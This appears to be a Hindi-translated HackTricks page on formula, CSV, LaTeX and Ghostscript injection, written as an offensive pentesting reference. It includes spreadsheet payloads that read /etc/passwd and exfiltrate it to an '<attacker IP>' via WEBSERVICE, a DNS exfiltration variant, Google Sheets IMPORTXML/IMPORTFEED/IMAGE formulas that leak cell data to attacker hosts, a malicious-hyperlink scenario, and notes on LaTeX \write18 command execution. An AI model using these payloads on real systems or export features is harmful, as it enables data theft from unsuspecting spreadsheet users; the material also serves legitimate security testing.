Formula/CSV/Doc/LaTeX/GhostScript Injection
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
यदि आपका input CSV files (या किसी अन्य फ़ाइल जो शायद Excel द्वारा खोली जाएगी) के अंदर प्रतिबिंबित हो रहा है, तो आप Excel formulas डालने में सक्षम हो सकते हैं जो तब executed होंगे जब उपयोगकर्ता फाइल खोलता है या जब उपयोगकर्ता excel sheet के अंदर कुछ लिंक पर क्लिक करता है।
आजकल Excel उपयोगकर्ता को चेतावनी देगा (कई बार) जब कुछ Excel से बाहर से लोड किया जाता है ताकि उसे दुर्भावनापूर्ण कार्रवाई से रोका जा सके। इसलिए, अंतिम payload पर सामाजिक इंजीनियरिंग पर विशेष प्रयास करना आवश्यक है।
निम्नलिखित उदाहरण अंतिम एक्सेल शीट से सामग्री निकालने और मनमाने स्थानों पर अनुरोध करने के लिए बहुत उपयोगी है। लेकिन इसके लिए उपयोगकर्ता को लिंक पर क्लिक करना आवश्यक है (और चेतावनी संकेतों को स्वीकार करना आवश्यक है)।
The following example was taken from https://payatu.com/csv-injection-basic-to-exploit
कल्पना करें कि एक छात्र रिकॉर्ड प्रबंधन प्रणाली में सुरक्षा उल्लंघन को CSV इंजेक्शन हमले के माध्यम से शोषण किया गया है। हमलावर का प्राथमिक इरादा उस प्रणाली को समझौता करना है जिसका उपयोग शिक्षक छात्र विवरण प्रबंधित करने के लिए करते हैं। यह विधि हमलावर द्वारा एप्लिकेशन में एक दुर्भावनापूर्ण पेलोड इंजेक्ट करने में शामिल है, विशेष रूप से छात्र विवरण के लिए निर्धारित क्षेत्रों में हानिकारक सूत्र दर्ज करके। हमला इस प्रकार unfolds:
दुर्भावनापूर्ण पेलोड का इंजेक्शन:
हमलावर एक छात्र विवरण फॉर्म प्रस्तुत करता है लेकिन इसमें एक सूत्र शामिल करता है जो स्प्रेडशीट में सामान्यतः उपयोग किया जाता है (जैसे, =HYPERLINK("<malicious_link>","Click here")
).
यह सूत्र एक हाइपरलिंक बनाने के लिए डिज़ाइन किया गया है, लेकिन यह हमलावर द्वारा नियंत्रित एक दुर्भावनापूर्ण सर्वर की ओर इशारा करता है।
समझौता किए गए डेटा का निर्यात:
शिक्षक, समझौते के बारे में अनजान, डेटा को CSV फ़ाइल में निर्यात करने के लिए एप्लिकेशन की कार्यक्षमता का उपयोग करते हैं।
CSV फ़ाइल, जब खोली जाती है, तब भी इसमें दुर्भावनापूर्ण पेलोड होता है। यह पेलोड स्प्रेडशीट में एक क्लिक करने योग्य हाइपरलिंक के रूप में दिखाई देता है।
हमले को सक्रिय करना:
एक शिक्षक हाइपरलिंक पर क्लिक करता है, यह मानते हुए कि यह छात्र के विवरण का एक वैध हिस्सा है।
क्लिक करने पर, संवेदनशील डेटा (संभवतः स्प्रेडशीट या शिक्षक के कंप्यूटर से विवरण शामिल) हमलावर के सर्वर पर भेजा जाता है।
डेटा को लॉग करना:
हमलावर का सर्वर शिक्षक के कंप्यूटर से भेजे गए संवेदनशील डेटा को प्राप्त और लॉग करता है।
हमलावर फिर इस डेटा का उपयोग विभिन्न दुर्भावनापूर्ण उद्देश्यों के लिए कर सकता है, छात्रों और संस्थान की गोपनीयता और सुरक्षा को और अधिक समझौता करता है।
अधिक विवरण के लिए मूल पोस्ट की जांच करें।
विशिष्ट कॉन्फ़िगरेशन या पुराने संस्करणों के Excel में, एक सुविधा जिसे डायनामिक डेटा एक्सचेंज (DDE) कहा जाता है, का उपयोग मनमाने आदेशों को निष्पादित करने के लिए किया जा सकता है। इसका लाभ उठाने के लिए, निम्नलिखित सेटिंग्स सक्षम की जानी चाहिए:
फ़ाइल → विकल्प → ट्रस्ट सेंटर → ट्रस्ट सेंटर सेटिंग्स → बाहरी सामग्री पर जाएं, और डायनामिक डेटा एक्सचेंज सर्वर लॉन्च सक्षम करें।
जब दुर्भावनापूर्ण पेलोड के साथ एक स्प्रेडशीट खोली जाती है (और यदि उपयोगकर्ता चेतावनियों को स्वीकार करता है), तो पेलोड निष्पादित होता है। उदाहरण के लिए, कैलकुलेटर एप्लिकेशन लॉन्च करने के लिए, पेलोड होगा:
अतिरिक्त कमांड भी निष्पादित किए जा सकते हैं, जैसे कि PowerShell का उपयोग करके एक फ़ाइल डाउनलोड और निष्पादित करना:
LibreOffice Calc का उपयोग स्थानीय फ़ाइलों को पढ़ने और डेटा को एक्सफ़िल्ट्रेट करने के लिए किया जा सकता है। यहाँ कुछ विधियाँ हैं:
स्थानीय /etc/passwd
फ़ाइल से पहली पंक्ति पढ़ना: ='file:///etc/passwd'#$passwd.A1
पढ़े गए डेटा को हमलावर-नियंत्रित सर्वर पर एक्सफ़िल्ट्रेट करना: =WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)))
एक से अधिक पंक्तियाँ एक्सफ़िल्ट्रेट करना: =WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))
DNS एक्सफ़िल्ट्रेशन (पढ़े गए डेटा को DNS क्वेरी के रूप में हमलावर-नियंत्रित DNS सर्वर पर भेजना): =WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<attacker domain>"))
Google Sheets ऐसी फ़ंक्शन प्रदान करता है जिन्हें OOB डेटा एक्सफ़िल्ट्रेशन के लिए शोषित किया जा सकता है:
CONCATENATE: स्ट्रिंग्स को एक साथ जोड़ता है - =CONCATENATE(A2:E2)
IMPORTXML: संरचित डेटा प्रकारों से डेटा आयात करता है - =IMPORTXML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
IMPORTFEED: RSS या ATOM फ़ीड आयात करता है - =IMPORTFEED(CONCAT("http://<attacker IP:Port>//123.txt?v=", CONCATENATE(A2:E2)))
IMPORTHTML: HTML तालिकाओं या सूचियों से डेटा आयात करता है - =IMPORTHTML (CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
IMPORTRANGE: किसी अन्य स्प्रेडशीट से सेल की एक श्रृंखला आयात करता है - =IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")
IMAGE: एक सेल में एक छवि डालता है - =IMAGE("https://<attacker IP:Port>/images/srpr/logo3w.png")
आमतौर पर, सर्वर जो इंटरनेट पर LaTeX कोड को PDF में परिवर्तित करते हैं, वे pdflatex
का उपयोग करते हैं।
यह प्रोग्राम कमांड निष्पादन को (अ)अनुमति देने के लिए 3 मुख्य विशेषताओं का उपयोग करता है:
--no-shell-escape
: \write18{command}
निर्माण को अक्षम करें, भले ही यह texmf.cnf फ़ाइल में सक्षम हो।
--shell-restricted
: --shell-escape
के समान, लेकिन 'सुरक्षित' सेट की पूर्वनिर्धारित **कमांड्स पर सीमित।
--shell-escape
: \write18{command}
निर्माण को सक्षम करें। कमांड कोई भी शेल कमांड हो सकता है। सुरक्षा कारणों से इस निर्माण को सामान्यतः अनुमति नहीं दी जाती है।
हालांकि, कमांड निष्पादन के अन्य तरीके हैं, इसलिए RCE से बचने के लिए --shell-restricted
का उपयोग करना बहुत महत्वपूर्ण है।
आपको [ या $ जैसे रैपर के साथ इंजेक्शन को समायोजित करने की आवश्यकता हो सकती है।
कमांड का इनपुट stdin पर पुनर्निर्देशित किया जाएगा, इसे प्राप्त करने के लिए एक अस्थायी फ़ाइल का उपयोग करें।
यदि आपको कोई LaTex त्रुटि मिलती है, तो खराब वर्णों के बिना परिणाम प्राप्त करने के लिए base64 का उपयोग करने पर विचार करें।
From @EdOverflow
चेक करें https://blog.redteam-pentesting.de/2023/ghostscript-overview/
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)